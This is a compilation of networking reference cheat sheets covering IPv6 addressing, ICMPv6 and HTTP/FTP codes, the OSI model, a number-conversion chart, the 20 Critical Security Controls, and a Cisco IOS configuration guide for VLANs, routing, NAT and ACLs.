Subnet Prefix (n bits) 0 (128-n)
Subnet-Router Anycast Address
1111111010 (10 bits) 0 (54 bits) Interface ID (64 bits)
Link-Local IPv6 Unicast Address (FE80::/10 )
1111111011 (10 bits) Subnet ID (54) Interface ID (64 bits)
Site-Local IPv6 Unicast Address (FEC0::/10)
Global routing prefix (45) Subnet ID (16) Interface ID (64)
IPv6 Global Unicast Addresses (2000::/3 prefix, IANA delegated)
001
Global routing prefix (n) Subnet ID (64-1) Interface ID (64)
IPv6 Global Unicast Addresses (not starting with binary value 000)
! 000
Global routing prefix (n bits) Subnet ID (m) Interface ID (128-n-m)
General Format for IPv6 Global Unicast Addresses
Well Known Multicast Addresses
Interface-localFF01:0:0:0:0:0:0:1 All Nodes Addresses
Link-localFF02:0:0:0:0:0:0:1 All Nodes Addresses
Interface-localFF01:0:0:0:0:0:0:2 All Routers Addresses
Link-localFF02:0:0:0:0:0:0:2 All Routers Addresses
Site-localFF05:0:0:0:0:0:0:2 All Routers Addresses
Link-localFF02:0:0:0:0:1:FFXX:XXXX Solicited-Node Address
Link-localFF02:0:0:0:0:0:0:4 DVMRP Routers
Link-localFF02:0:0:0:0:0:0:5 OSPFIGP
Link-localFF02:0:0:0:0:0:0:6 OSPFIGP DRs
Link-localFF02:0:0:0:0:0:0:9 RIP Routers
Link-localFF02:0:0:0:0:0:0:D All PIM Routers
Link-localFF02:0:0:0:0:0:0:16 All MLDv2 Routers
Link-localFF02:0:0:0:0:0:1:2 All DHCP Agents
Site-localFF05:0:0:0:0:0:1:3 All DHCP Servers
Variable ScopeFF0X:0:0:0:0:0:0:101 Network Time Protocol
Ethernet Types
0800 IPv4
0806 ARP
8035 Reverse ARP
86DD IPv6
8847 MPLS Unicast
8848 MPLS Multicast
8863 PPoE (Discovery stage)
8864 PPoE (PPP sess stage)
Multicast Address
FF
(8 bits)
Flags
(4)
Scope
(4)
IPv6 Cheat Sheet
Address Type Binary Prefix IPv6 Notation
Unspecified 00...0 (128 bits) ::/128
Loopback 00...1 (128 bits) ::1/128
Multicast 11111111 FF00::/8
Link-local unicast 1111111010 FE80::/10
Site-local unicast* 1111111011 FEC0::/10
Global unicast (everything else)
IPv4-Compatible IPv6* 0:0:0:0:0:0:A.B.C.D
IPv4-Mapped IPv6 0:0:0:0:0:FFFF:A.B.C.D
Anycast Unicast address assigned to multiple interfaces.
IPv6 Addressing * Deprecated
6to4 2002::/16
ICMPv6 Error Messages (Type/Code)
1 Destination Unreachable
0 - no route to destination
1 - communication with destination
administratively prohibited
2 - (not assigned)
3 - address unreachable
4 - port unreachable
2 Packet Too Big
3 Time Exceeded
0 - hop limit exceeded in transit
1 - fragment reassembly time exceeded
4 Parameter Problem
0 - erroneous header field
1 - unrecognized Next Header type
2 - unrecognized IPv6 option
0-127 Error Messages
ICMPv6 Informational Messages
128 Echo Request
129 Echo Reply
130 Multicast Listener Query
131 Multicast Listener Report
132 Multicast Listener Done
133 Router Solicitation
134 Router Advertisement
135 Neighbor Solicitation
136 Neighbor Advertisement
137 Redirect Message
138 Router Renumbering
139 ICMP Node Information Query
140 ICMP Node Information Response
143 Version 2 Multicast Listener Report
144 Home Agent Address Discovery Request
145 Home Agent Address Discovery Reply
146 Mobile Prefix Solicitation
147 Mobile Prefix Advertisement
128 - 255 Informational Messages
IPv6 Next Header Fields
041 IPv6
000 IPv6 Hop-by-Hop Option
060 Destination Options for IPv6
043 Routing Header for IPv6
044 Fragment Header for IPv6
051 Authentication Header (AH)
050 Encap Security Payload (ESP)
059 No Next Header for IPv6
002 Internet Group Management (IGMP)
006 Transmission Control (TCP)
017 User Datagram (UDP)
046 Reservation Protocol (RSVP)
047 General Routing Encapsulation (GRE)
055 IP Mobility (MOBILE)
058 ICMP for IPv6 (ICMPv6)
089 OSPFIGP
094 IP-within-IP Encapsulation Protocol (IPIP)
103 Protocol Independent Multicast (PIM)
135 Mobility Header
IPv6 Extension Headers
( NH = Next Header )
Destination Address (128 bits) [16 bytes]
Source Address (128 bits) [16 bytes]
Payload Length (16) Next Header (8) Hop Limit (8)
Flow Label (20)Version (4) Traffic Class (8)
IPv6 Header
IPv6 Option Types (8 bits, 3 fields)
act - 2 bits
00 skip over option
01 silently discard
10 discard and send ICMP
11 discard and send ICMP, if unicast
chg - 1 bit
0 = option data does not change en-route
1 = option data may change en-route
rest - 5 bits, the rest of the Option Type
Group ID
(112)
IPv6 Header
NH = TCP
IPv6 Header
NH = Routing
Routing Header
NH = TCP
TCP Header
+ Data
IPv6 Header
NH = Routing
Routing Header
NH = Fragment
Fragment Header
NH = TCP
TCP Header
+ Data
TCP Header
+ Data
www.estoile.com (03/02/2011)
Unique local unicast 1111110000 FC00::/7
88
9
ScopeTCP/IP
Model
# Name
7 Application
FTAM, X.400,
X.500, DAP, ROSE,
RTSE, ACSE
NNTP, SIP, SSI, DNS, FTP,
Gopher, HTTP, NFS, NTP,
DHCP, SMPP, SMTP,
SNMP, Telnet, RIP, BGP,
BOOTP, TFTP, POP3,
IMAP,
User Applications
Services User Data Application Data
6 Presentation
ISO/IEC 8823,
X.226, ISO/IEC 9576-
1, X.236
MIME, SSL, TLS, XDR,
Shells and Redirectors
5 Session
ISO/IEC 8327,
X.225, ISO/IEC 9548-
1, X.235
Sockets. Session
establishment in TCP, SIP,
RTP, NetBIOS, RPC,
Named Pipes
4 Transport
ISO/IEC 8073, TP0,
TP1, TP2, TP3, TP4
(X.224),
ISO/IEC 8602, X.234 TCP, UDP, SCTP
Process-Level Addressing;
Multiplexing/Demultiplex
ing; Connections;
Segmentation and
Reassembly;
Acknowledgments and
Retransmissions; Flow
Control
Datagrams/
Segments
Transport
(TCP)
3 Network
ISO/IEC 8208, X.25
(PLP), ISO/IEC 8878,
X.223, ISO/IEC 8473-
1, CLNP X.233.
IP, IPsec, ICMP, IGMP,
OSPF, IPv6; IP NAT; IPsec;
Mobile IP; ICMP; IPX;
DLC; PLP; Routing
protocols such as RIP and
BGP
Internet
(IP)
2 Data Link
ISO/IEC 7666, X.25
(LAPB), Token Bus,
X.222, ISO/IEC 8802-
2 LLC Type 1 and 2 PPP, SLIP, PPTP, L2TP
Low-level data
messages
between local
devices
1 Physical
X.25 (X.21bis,
EIA/TIA-232,
EIA/TIA-449, EIA-
530, G.703)
Electrical or light
signals sent
between local
devices
Encoding and Signaling;
Physical Data
Transmission; Hardware
Specifications; Topology
and Design Bits
Network
Layer OSI protocols Responsibilities
Application
Session Establishment,
Management and
Termination Sessions
Sessions between
local or remote
devices
910
HTTP/1.1 Status CodesCode Name Notes
100 Continue
101 Switching Protocols
Suc
cess
ful
200 OK Everything is normal
201 Created
202 Accepted
203 Non-Authoritative Information
204 No Content
205 Reset Content
206 Partial Content
Red
irect
ion
300 Multiple Choices
301 Moved Permanently Update your URL, this has moved for good.
302 Found
303 See Other
304 Not Modified
305 Use Proxy
306 Unused
307 Temporary Redirect This is temporarly moved, don't update your bookmarks.
Clie
nt E
rror
400 Bad Request Server didn't understand the URL you gave it.
401 Unauthorized Must be authenticated
402 Payment Required Not used really
403 Forbidden Server refuses to give you a file, authentication won't help
404 Not Found A file doesn't exist at that address
405 Method Not Allowed
406 Not Acceptable
407 Proxy Authentication Required
408 Request Timeout Browser took too long to request something
409 Conflict
410 Gone
411 Lengh Required
412 Precondition Failed
413 Reqeust Entity Too Large
415 Unsupported Media Type
416 Request Range Not Satisfiable
417 Expectation Failed
Ser
ver E
rror
500 Internal Server Error Something on the server didn't work right.
501 Not Implemented
502 Bad Gateway
503 Service Unavailable Too busy to respond to a client
504 Gateway Timeout
505 HTTP Version Not SupportedCreative Commons Attribution-Share Alike 3.0 Unported – Bryan English - http://bluelinecity.com
11
FTP
Code Explanation 100 Series The requested action is being initiated, expect another reply before proceeding with a new command. 110 Restart marker replay . In this case, the text is exact and not left to the particular implementation; it must read: MARK yyyy = mmmm where yyyy is User-process data stream marker, and mmmm server's equivalent marker (note the spaces between markers and "="). 120 Service ready in nnn minutes. 125 Data connection already open; transfer starting. 150 File status okay; about to open data connection. 200 Series The requested action has been successfully completed. 202 Command not implemented, superfluous at this site. 211 System status, or system help reply. 212 Directory status. 213 File status. 214 Help message.On how to use the server or the meaning of a particular non-standard command. This reply is useful only to the human user. 215 NAME system type. Where NAME is an official system name from the registry kept by IANA. 220 Service ready for new user. 221 Service closing control connection. 225 Data connection open; no transfer in progress. 226 Closing data connection. Requested file action successful (for example, file transfer or file abort). 227 Entering Passive Mode (h1,h2,h3,h4,p1,p2). 228 Entering Long Passive Mode (long address, port). 229 Entering Extended Passive Mode (|||port|). 230 User logged in, proceed. Logged out if appropriate. 231 User logged out; service terminated. 232 Logout command noted, will complete when transfer done. 234 Specifies that the server accepts the authentication mechanism specified by the client, and the exchange of security data is complete. A higher level nonstandard code created by Microsoft. 250 Requested file action okay, completed. 257 "PATHNAME" created. 300 Series The command has been accepted, but the requested action is on hold, pending receipt of further information. 331 User name okay, need password. 332 Need account for login. 350 Requested file action pending further information 400 Series The command was not accepted and the requested action did not take place, but the error condition is temporary and the action may be requested again. 421 Service not available, closing control connection. This may be a reply to any command if the service knows it must shut down. 425 Can't open data connection. 426 Connection closed; transfer aborted. 430 Invalid username or password 434 Requested host unavailable. 450 Requested file action not taken. 451 Requested action aborted. Local error in processing. 452 Requested action not taken. Insufficient storage space in system.File unavailable (e.g., file busy). 500 Series Syntax error, command unrecognized and the requested action did not take place. This may include errors such as command line too long. 501 Syntax error in parameters or arguments. 502 Command not implemented. 503 Bad sequence of commands. 504 Command not implemented for that parameter. 530 Not logged in. 532 Need account for storing files. 550 Requested action not taken. File unavailable (e.g., file not found, no access). 551 Requested action aborted. Page type unknown. 552 Requested file action aborted. Exceeded storage allocation (for current directory or dataset). 553 Requested action not taken. File name not allowed. 600 Series Replies regarding confidentiality and integrity 631 Integrity protected reply. 632 Confidentiality and integrity protected reply. 633 Confidentiality protected reply. 10000 Series Common Winsock Error Codes 10054 Connection reset by peer. The connection was forcibly closed by the remote host. 10060 Cannot connect to remote server. 10061 Cannot connect to remote server. The connection is actively refused by the server.
12
List of raw FTP commands
(Warning: this is a technical document, not necessary for most FTP use.)
Note that commands marked with a * are not implemented in a number of FTP servers.
Common commands
ABOR - abort a file transfer
CWD - change working directory
DELE - delete a remote file
LIST - list remote files
MDTM - return the modification time of a file
MKD - make a remote directory
NLST - name list of remote directory
PASS - send password
PASV - enter passive mode
PORT - open a data port
PWD - print working directory
QUIT - terminate the connection
RETR - retrieve a remote file
RMD - remove a remote directory
RNFR - rename from
RNTO - rename to
SITE - site-specific commands
SIZE - return the size of a file
STOR - store a file on the remote host
TYPE - set transfer type
USER - send username
Less common commands
ACCT* - send account information
APPE - append to a remote file
CDUP - CWD to the parent of the current directory
HELP - return help on using the server
MODE - set transfer mode
NOOP - do nothing
REIN* - reinitialize the connection
STAT - return server status
STOU - store a file uniquely
STRU - set file transfer structure
SYST - return system type
13
Decimal-Binary-Hexadecimal Conversion ChartThis chart shows all of the combinations of decimal, binary and hexadecimal from 0 to 25 5 decimal. When m aking a change in a C V this chart will show the conversion for different
numbering system s. Som e decoders sp lit the C V into two pa rts. W hen you modify a CV you need to write back all 8 bits. T his cha rt will help determine the co rrect bit va lue a C V.
Decimal Binary Hex Decimal Binary Hex Decimal Binary Hex Decimal Binary Hex
Bit N o.> 76543210 76543210 76543210 76543210
0 00000000 0 64 01000000 40 128 10000000 80 192 11000000 C0
1 00000001 1 65 01000001 41 129 10000001 81 193 11000001 C1
2 00000010 2 66 01000010 42 130 10000010 82 194 11000010 C2
3 00000011 3 67 01000011 43 131 10000011 83 195 11000011 C3
4 00000100 4 68 01000100 44 132 10000100 84 196 11000100 C4
5 00000101 5 69 01000101 45 133 10000101 85 197 11000101 C5
6 00000110 6 70 01000110 46 134 10000110 86 198 11000110 C6
7 00000111 7 71 01000111 47 135 10000111 87 199 11000111 C7
8 00001000 8 72 01001000 48 136 10001000 88 200 11001000 C8
9 00001001 9 73 01001001 49 137 10001001 89 201 11001001 C9
10 00001010 A 74 01001010 4A 138 10001010 8A 202 11001010 CA
11 00001011 B 75 01001011 4B 139 10001011 8B 203 11001011 CB
12 00001100 C 76 01001100 4C 140 10001100 8C 204 11001100 CC
13 00001101 D 77 01001101 4D 141 10001101 8D 205 11001101 CD
14 00001110 E 78 01001110 4E 142 10001110 8E 206 11001110 CE
15 00001111 F 79 01001111 4F 143 10001111 8F 207 11001111 CF
16 00010000 10 80 01010000 50 144 10010000 90 208 11010000 D0
17 00010001 11 81 01010001 51 145 10010001 91 209 11010001 D1
18 00010010 12 82 01010010 52 146 10010010 92 210 11010010 D2
19 00010011 13 83 01010011 53 147 10010011 93 211 11010011 D3
20 00010100 14 84 01010100 54 148 10010100 94 212 11010100 D4
21 00010101 15 85 01010101 55 149 10010101 95 213 11010101 D5
22 00010110 16 86 01010110 56 150 10010110 96 214 11010110 D6
23 00010111 17 87 01010111 57 151 10010111 97 215 11010111 D7
24 00011000 18 88 01011000 58 152 10011000 98 216 11011000 D8
25 00011001 19 89 01011001 59 153 10011001 99 217 11011001 D9
26 00011010 1A 90 01011010 5A 154 10011010 9A 218 11011010 DA
27 00011011 1B 91 01011011 5B 155 10011011 9B 219 11011011 DB
28 00011100 1C 92 01011100 5C 156 10011100 9C 220 11011100 DC
29 00011101 1D 93 01011101 5D 157 10011101 9D 221 11011101 DD
30 00011110 1E 94 01011110 5E 158 10011110 9E 222 11011110 DE
31 00011111 1F 95 01011111 5F 159 10011111 9F 223 11011111 DF
32 00100000 20 96 01100000 60 160 10100000 A0 224 11100000 E0
33 00100001 21 97 01100001 61 161 10100001 A1 225 11100001 E1
34 00100010 22 98 01100010 62 162 10100010 A2 226 11100010 E2
35 00100011 23 99 01100011 63 163 10100011 A3 227 11100011 E3
36 00100100 24 100 01100100 64 164 10100100 A4 228 11100100 E4
37 00100101 25 101 01100101 65 165 10100101 A5 229 11100101 E5
38 00100110 26 102 01100110 66 166 10100110 A6 230 11100110 E6
39 00100111 27 103 01100111 67 167 10100111 A7 231 11100111 E7
40 00101000 28 104 01101000 68 168 10101000 A8 232 11101000 E8
41 00101001 29 105 01101001 69 169 10101001 A9 233 11101001 E9
42 00101010 2A 106 01101010 6A 170 10101010 AA 234 11101010 EA
43 00101011 2B 107 01101011 6B 171 10101011 AB 235 11101011 EB
44 00101100 2C 108 01101100 6C 172 10101100 AC 236 11101100 EC
45 00101101 2D 109 01101101 6D 173 10101101 AD 237 11101101 ED
46 00101110 2E 110 01101110 6E 174 10101110 AE 238 11101110 EE
47 00101111 2F 111 01101111 6F 175 10101111 AF 239 11101111 EF
48 00110000 30 112 01110000 70 176 10110000 B0 240 11110000 F0
49 00110001 31 113 01110001 71 177 10110001 B1 241 11110001 F1
50 00110010 32 114 01110010 72 178 10110010 B2 242 11110010 F2
51 00110011 33 115 01110011 73 179 10110011 B3 243 11110011 F3
52 00110100 34 116 01110100 74 180 10110100 B4 244 11110100 F4
53 00110101 35 117 01110101 75 181 10110101 B5 245 11110101 F5
54 00110110 36 118 01110110 76 182 10110110 B6 246 11110110 F6
55 00110111 37 119 01110111 77 183 10110111 B7 247 11110111 F7
56 00111000 38 120 01111000 78 184 10111000 B8 248 11111000 F8
57 00111001 39 121 01111001 79 185 10111001 B9 249 11111001 F9
58 00111010 3A 122 01111010 7A 186 10111010 BA 250 11111010 FA
59 00111011 3B 123 01111011 7B 187 10111011 BB 251 11111011 FB
60 00111100 3C 124 01111100 7C 188 10111100 BC 252 11111100 FC
61 00111101 3D 125 01111101 7D 189 10111101 BD 253 11111101 FD
62 00111110 3E 126 01111110 7E 190 10111110 BE 254 11111110 FE
63 00111111 3F 127 01111111 7F 191 10111111 BF 255 11111111 FF
Binary Num ber System for one byte
Bit Number| 7| 6| 5| 4|3|2|1|0|Bit Weight|128|64|32|16|8|4|2|1|
Some Commonly used CVs
CV -1 Short Address CV-6 M id Point Voltage
CV-2 Start Voltage CV-7 Ver N um ber
CV -3 Acceleration Ra te CV-8 M aker ID
CV -4 D eceleration Rate CV -17 /18 Long Address
CV-5 M aximum Voltage CV -19 Consist Address
CV-21 Advance Consist function control
CV-22 Advance Consist headlight control
CV -23 Adva nce Consist acceleration r ate
CV -24 Adva nce Consist decelera tion ra te
SEE YOUR DECODER MANUAL FORALL OF THE CVs IT USES AND THERANGE OF VALUES.
CV-29 C onfiguration R egister
Bit 0= Direction of travel
Bit 1=Speed step 28
Bit 2 =d.c. enable
Bit 3= Advance acknow ledgment
Bit 4 = A lternate speed tab le
Bit 5= Long address.
CV -66 Forw ard T rim
CV -67 to 94 Speed Table
CV-95 Reverse Trim
DEF 24April02
1014
The 20 Critical Controls
1 - Inventory of Authorised and Unauthorised Devices
Actively manage (inventory, track, and correct) all hardware devices on the network so that only authorized
devices are given access, and unauthorized and unmanaged devices are found and prevented from gaining
access.
2 - Inventory of Authorised and Unauthorised Software
Actively manage (inventory, track, and correct) all software on the network so that only authorized software is
installed and can execute, and that unauthorized and unmanaged software is found and prevented from
installation or execution.
3 - Secure Configurations for Hardware and Software on Mobile Devices, Laptops, Workstations and
Servers
Establish, implement, and actively manage (track, report on, correct) the security configuration of laptops,
servers, and workstations using a rigorous configuration management and change control process in order to
prevent attackers from exploiting vulnerable services and settings.
4 - Continuous Vulnerability Assessment and Remediation
Continuously acquire, assess, and take action on new information in order to identify vulnerabilities, remediate,
and minimize the window of opportunity for attackers.
5 - Malware Defences
Control the installation, spread, and execution of malicious code at multiple points in the enterprise, while
optimizing the use of automation to enable rapid updating of defense, data gathering, and corrective action.
6 - Application Software Security
Manage the security lifecycle of all in-house developed and acquired software in order to prevent, detect, and
correct security weaknesses.
7 - Wireless Access Control
The processes and tools used to track/control/prevent/correct the security use of wireless local area networks
(LANS), access points, and wireless client systems.
8 - Data Recovery Capability
The processes and tools used to properly back up critical information with a proven methodology for timely
recovery of it.
9 - Security Skills Assessment and Appropriate Training to Fill Gaps
For all functional roles in the organization (prioritizing those mission-critical to the business and its security),
identify the specific knowledge, skills, and abilities needed to support defense of the enterprise; develop and
execute an integrated plan to assess, identify gaps, and remediate through policy, organizational planning,
training, and awareness programs.
10 - Secure Configurations for Network Devices such as Firewalls, Routers and Switches
Establish, implement, and actively manage (track, report on, correct) the security configuration of network
infrastructure devices using a rigorous configuration management and change control process in order to
prevent attackers from exploiting vulnerable services and settings.
15
11 - Limitation and Control of Network Ports, Protocols and Services
Manage (track/control/correct) the ongoing operational use of ports, protocols, and services on networked
devices in order to minimize windows of vulnerability available to attackers.
12 - Controlled Use of Administrative Privileges
The processes and tools used to track/control/prevent/correct the use, assignment, and configuration of
administrative privileges on computers, networks, and applications.
13 - Boundary Defence
Detect/prevent/correct the flow of information transferring networks of different trust levels with a focus on
security-damaging data.
14 - Maintenance, Monitoring and Analysis of Audit Logs
Collect, manage, and analyze audit logs of events that could help detect, understand, or recover from an
attack.
15 - Control Access Based on the Need to Know
The processes and tools used to track/control/prevent/correct secure access to critical assets (e.g.,
information, resources, and systems) according to the formal determination of which persons, computers, and
applications have a need and right to access these critical assets based on an approved classification.
16 - Account Monitoring and Control
Actively manage the life-cycle of system and application accounts - their creation, use, dormancy, deletion - in
order to minimize opportunities for attackers to leverage them.
17 - Data Protection
The processes and tools used to prevent data exfiltration, mitigate the effects of exfiltrated data, and ensure
the privacy and integrity of sensitive information.
18 - Incident Response and Management
Protect the organization's information, as well as its reputation, by developing and implementing an incident
response infrastructure (e.g., plans, defined roles, training, communications, management oversight) for
quickly discovering an attack and then effectively containing the damage, eradicating the attacker's presence,
and restoring the integrity of the network and systems..
19 - Secure Network Engineering
Make security an inherent attribute of the enterprise by specifying, designing, and building-in features that
allow high confidence systems operations while denying or minimizing opportunities for attackers.
20 - Penetration Tests and Red Team Exercises
Test the overall strength of an organization's defenses (the technology, the processes, and the people) by
simulating the objectives and actions of an attacker.
16
Cisco Networking All-in-One To create and configure a Cisco network, you need to know about routers and switches to develop and manage secure Cisco systems. Become acquainted with Cisco network devices and code listings; and find out how to manage static routing and view routing information.
OSI Model for Cisco Networking
While you may not use the OSI model every day, you should be familiar with it, specifically when working with Cisco switches and routers (which operate at Layer 2 and Layer 3, respectively). Here are some of the items that operate at each level of the OSI model:
Layer Description Examples
7. Application Responsible for initiating or services the request. SMTP, DNS, HTTP, and Telnet
6.
Presentation
Formats the information so that it is understood by the receiving system. Compression and encryption depending on the
implementation
5. Session Responsible for establishing, managing, and terminating the session. NetBIOS
4. Transport Breaks information into segments and is responsible for connection and connectionless communication.
TCP and UDP
3. Network Responsible for logical addressing and routing IP, ICMP, ARP, RIP, IGRP, and routers
2. Data Link Responsible for physical addressing, error correction, and preparing the information for the
media
MAC address, CSMA/CD, switches, and bridges
1. Physical Deals with the electrical signal. Cables, connectors, hubs, and repeaters
How to Configure a Cisco Network
Like all networks, a Cisco network needs to be properly configured. To do so, you need to know the configuration modes to use when configuring your network. You also should know how to configure an interface, configure a switch management interface, and configure an interface to use DHCP for your Cisco network.
Configuration modes for Cisco networking
When moving around in the Cisco IOS, you will see many prompts. These prompts change as you move from one configuration mode to another. Here is a summary of the major configuration modes:
User EXEC mode: When you connect to a Cisco device the default configuration mode is user exec mode. With user exec mode you can view the settings on the device but not make any changes. You know you are in User EXEC mode because the IOS prompt displays a ">".
Privileged EXEC mode: In order to make changes to the device you must navigate to Privileged EXEC mode where you may be required to input a password. Privileged EXEC mode displays with a "#" in the prompt.
Global Configuration mode: Global Configuration mode is where you go to make global changes to the router such as the hostname. To navigate to Global Configuration mode from Privileged EXEC mode you type "configure terminal" or "conf t" where you will be placed at the "(config)#" prompt.
Sub Prompts: There are a number of different sub prompts from Global Configuration mode you can navigate to such as the interface prompts to modify settings on a
specific interface, or the line prompts to modify the different ports on the device.
Configure an interface for Cisco networking
When working with routers in particular, but also when dealing the management interface on switches, you will often need to configure network interfaces which will either match physical interface ports or virtual interfaces in the form of a virtual LAN (VLAN) interface (when dealing with switches).
For your router interfaces the following example will set speed, duplex and IP configuration information for the interface FastEthernet 0/0 (notice the interface reference as slot/port). In the case of the router, the interface is enabled using the no shutdown command in the final step; interfaces on switches are enabled by default.
Router1>enable Router1#configure terminal Router1(config)#interface FastEthernet0/0 Router1(config-if)#description Private LAN Router1(config-if)#speed 100 Router1(config-if)#duplex full Router1(config-if)#ip address 192.168.1.1 255.255.255.0 Router1(config-if)#no shutdown
Configure a switch management interface for Cisco networking
For your switches, to enable an IP address on your management interface, you will use something similar to this example. In this example, management is being performed over VLAN 1 - the default VLAN.
Switch1>enable Switch1#configure terminal Switch1#interface VLAN 1 Switch1(config-if)#ip address 192.168.1.241 255.255.255.0
Configure an interface to use DHCP for Cisco networking
If you want to configure either a router or switch to retrieve its IP configuration information from a network Dynamic Host Configuration Protocol (DHCP) server, then you can commands like the following example.
Router1>enable Router1#configure terminal Router1(config)#interface FastEthernet0/0 Router1(config-if)#ip dhcp
Creating a VLAN for Cisco Networking
When working with your Cisco network, you may want to separate users into different broadcast domains for security or traffic reduction. You can do this by implementing VLANs. The following example will create VLAN (VLAN2) and place the ports on a switch (from 1-12) into VLAN2.
Switch1>enable Switch1#configure terminal Switch1(config)#interface vlan 2 Switch1(config-if)#description Finance VLAN Switch1(config-if)#exit Switch1(config)#interface range FastEthernet 0/1 , FastEthernet 0/12 Switch1(config-if-range)#switchport mode access Switch1(config-if-range)#switchport access vlan 2
1117
If you are connecting two switches together, then you will want to allow all configured VLANs to pass between the two switches. This is accomplished by implementing a trunk port. To configure port 24 on your switch to be a trunk port, you will use the following code:
Switch1>enable Switch1#configure terminal Switch1(config)#interface FastEthernet 0/24 Switch1(config-if-range)#switchport mode trunk
Using EtherChannel for Cisco Networking
Don't be afraid to use EtherChannel on your Cisco network. EtherChannel allows you to take up to eight network ports on your switch and treat them as a single larger link. This can be used to connect servers with multiple network cards that are bonded (or teamed) to a switch, or to connect multiple switches together. There are two main negotiation protocols, Port Aggregation Protocol (PAgP) which is a proprietary Cisco protocol and Link Aggregation Control Protocol (LACP) which is an open standards protocol.
To set EtherChannel to use with of the protocols you will configure it to support one of the following modes.
auto: Sets the interface to respond to PAgP negotiation packets, but the interface will start negotiations on its own.
desireable: Sets the interface to actively attempt to negotiate a PAgP connection.
on: Forces the connection to bring all links up without using a protocol to negotiate connections. This mode can only connect to another device that is also set to on. When using this mode, the switch does not negotiate the link using either PAgP or LACP.
active: Sets the interface to actively attempt to negotiate connections with other LACP devices.
passive: Sets the interface to respond to LACP data if it receives negotiation requests from other systems.
The following example will configure EtherChannel to use group ports 11 and 12 on the switch together using PAgP as the protocol. The same type of command would be used on the switch to which Switch1 is connected.
Switch1> enable Switch1# configure terminal Switch1(config)# interface range FastEthernet0/11 -12 Switch1(config-if-range)# switchport mode access Switch1(config-if-range)# switchport access vlan 10 Switch1(config-if-range)# channel-group 5 mode desirable
Working with Spanning Tree Protocol for Cisco Networking
Spanning Tree Protocol (STP) enables you to create redundant loops on your Cisco network for fault tolerance, and prevents inadvertent loops that may be created on your network from bringing the network to its knees.
The following code will enable the Cisco proprietary Rapid Per VLAN Spanning Tree Protocol (PVST) over the open standard of Multiple Spanning Tree Protocol (MSTP). In addition to configuring STP on the switch, you will also configure port 2 on the switch for portfast, which allows the port to immediately transition to forwarding mode.
Switch1> enable Switch1# configure terminal Switch1(config)#spanning-tree mode rapid-pvst Switch1(config)#interface FastEthernet 0/2 Switch1(config-if)#spanning-tree portfast %Warning: portfast should only be enabled on ports connected to a single host. Connecting hubs, concentrators, switches, bridges, etc... to this
interface when portfast is enabled, can cause temporary bridging loops. Use with CAUTION %Portfast will be configured in 10 interfaces due to the range command
but will only have effect when the interfaces are in a non-trunking mode.
Managing Static Routing for Cisco Networking
When working with your routers on your Cisco network, it's very likely that you'll want to have your routers route data. The first step in having your router pass data from one interface to another interface is to enable routing; just use these commands.
Router1>enable Router1#configure terminal Router1(config)#ip routing
Whether or not you choose to use a dynamic routing protocol, you may add static routes to your router. The following will add a static route to Router1 to send data to the 192.168.5.0/24 network using the router with the IP address of 192.168.3.2.
Router1>enable Router1#configure terminal Router1(config)#ip routing Router1(config)#ip route 192.168.5.0 255.255.255.0 192.168.3.2
Managing routing information protocol for Cisco networking
Routing Information Protocol (RIP) is widely used, with version 2 allowing you to use Variable Length Subnet Masks (VLSM) across your network. The following code will enable routing, enable RIP, set RIP to version 2, disable route summarization, defines the distributed network from this router as 192.168.5.0/24, and rather than broadcasting routes, it will send RIP data directly to 192.168.1.1.
Router2>enable Router2#configure terminal Router2(config)#ip routing Router2(config)#router rip Router2(config-router)#version 2 Router2(config-router)#no auto-summary Router1(config-router)#network 192.168.5.0 Router2(config-router)#neighbor 192.168.1.1
Managing enhanced interior gateway routing protocol for Cisco networking
Enhanced Interior Gateway Routing Protocol (EIGRP) is the updated version of IGRP. The following code will enable EIGRP using an autonomous-system (AS) number of 100, distribute two networks and disables auto summary.
Router2>enable Router2#configure terminal Router2(config)#ip routing Router2(config)#router eigrp 100 Router2(config-router)#network 192.168.1.0 Router2(config-router)#network 192.168.5.0 Router2(config-router)#no auto-summary
Managing open shortest path first for Cisco networking
Open Shortest Path First (OSPF) is a link state protocol which is widely used. OSPF uses the address of the loopback interface as the OSPF identifier, so this example will set the address of the loopback interface, then enable OSPF with a process ID of 100, and distributing a network of 192.168.255.254 and a network of 192.168. 5.0/24
Router2>enable Router2#configure terminal
1218
Router2(config)#interface loopback 0 Router2(config-if)#ip address 192.168.255.254 255.255.255.0 Router2(config-if)#exit Router2(config)#router ospf 100 Router2(config-router)#network 192.168.255.254 0.0.0.0 area 0 Router2(config-router)#network 192.168.5.0 0.0.0.255 area 0
Viewing Routing Information for Cisco Networking
After setting up any routing protocol that you want to implement - RIP, OSPF, or EIGRP - you can view all of your routing information through the ip routecommand. The following is an example of the output of this command. The output includes a legend showing the codes for each routing protocol, and the specific routes are identified by the source protocol.
Router2>enable Password: Router2#show ip route Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
E1 - OSPF external type 1, E2 - OSPF external type 2 i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2 ia - IS-IS inter area, * - candidate default, U - per-user static route
o - ODR, P - periodic downloaded static route Gateway of last resort is not set D 192.168.10.0/24 [90/284160] via 192.168.1.1, 00:04:19, FastEthernet0/0
O 192.168.10.0/24 [110/11] via 192.168.1.1, 00:01:01, FastEthernet0/0 R 192.168.10.0/24 [120/1] via 192.168.1.1, 00:00:07, FastEthernet0/0 C 192.168.5.0/24 is directly connected, FastEthernet0/1
C 192.168.1.0/24 is directly connected, FastEthernet0/0 S 192.168.3.0/24 [1/0] via 192.168.1.1
Securing a Cisco Network
Security is always a concern, and your Cisco network needs to be properly secured. In the following sections, you see how to secure your Cisco network by configuring NAT, by configuring an ACL, and by applying that ACL.
Securing your Cisco network by configuring NAT
The following commands are used to configure NAT overload services on a router called Router1. In this example, a list of source address is created in access list #1, which is then used as the inside source list. The FastEthernet 0/0 port is the overloaded public address port that all inside addresses get translated to.
Router1>enable Router1#configure terminal Router1(config)#access-list 1 permit 10.0.0.0 0.255.255.255 Router1(config)#ip nat inside source list 1 interface FastEthernet 0/0 overload Router1(config)#interface FastEthernet0/0 Router1(config-if)#ip nat outside Router1(config-if)#interface FastEthernet0/1 Router1(config-if)#ip nat inside
Securing your Cisco network by configuring an access control list (ACL)
ACLs are used to control traffic flow. They can be used allow or deny the flow of traffic. The two main types of ACLs are:
Standard ACLs, which have fewer options for classifying data and controlling traffic flow than Extended ACLs. They are only able to manage traffic based on the source IP address. These ACLs are numbered from 1–99 and from 1300–1999.
